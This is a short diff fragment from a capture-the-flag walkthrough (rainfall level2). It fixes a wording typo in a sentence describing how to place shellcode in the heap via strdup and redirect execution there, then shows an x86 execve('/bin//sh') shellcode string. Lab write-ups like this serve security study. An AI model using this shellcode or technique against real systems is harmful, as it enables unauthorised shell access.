BEAJousama/rainfall/level2/walkthrough.md

    }
 ```

-so we gone try to Put shellcode in the heap (via strdup(input)), And redirecting execution to that heap address.
+so we will try to Put shellcode in the heap (via strdup(input)), And redirecting execution to that heap address.

 ```
 shellcode="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"